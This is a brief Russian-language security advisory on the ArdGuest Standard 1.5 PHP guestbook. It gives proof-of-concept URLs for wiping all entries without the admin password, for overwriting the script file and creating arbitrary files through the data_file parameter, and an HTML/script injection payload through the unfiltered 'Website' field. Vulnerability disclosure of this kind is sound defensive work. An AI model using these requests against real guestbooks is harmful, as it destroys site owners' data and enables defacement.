__________               ___ ___  
\______   \__ __  ______/   |   \ 
 |       _/  |  \/  ___/    _    \
 |    |   \  |  /\___ \\         /
 |____|_  /____//____  >\___|_  / 
 -======\/==security=\/=team==\/

Advisory#11 
 
Script name : ArdGuest Standard
Version : 1.5
WebSite : http://www.promosi-web.com/script/guestbook
Email : aryasmail@yahoo.com.au
File name : ardguest.php

Использование в запросе переменной $max_record_in_data_file позволяет без пароля администратора удалить все 
записи из файла базы гостевой книги пример: 

http://www.site.ua/gb/ardguest.php?max_record_in_data_file=kaput

При неверно выставленном chmod (чтение/запись) на файл ardguest.php каталог gb возможна перезапись файла ardguest.php
http://www.site.ua/gb/ardguest.php?data_file=ardguest.php

Создание произвольного файла при условии chmod (rw-rw-rw) на каталог с гостевой
http://www.site.ua/gb/ardguest.php?data_file=test.txt

Не фильтруются передаваемые из формы данные в поле "Website", возможно внедрение в тело сообщения html-кода, пример:
<a href='http://aa.ru'><img src=http://www.site.ua/gb/webmaster.gif onload="alert('hacked')"></a>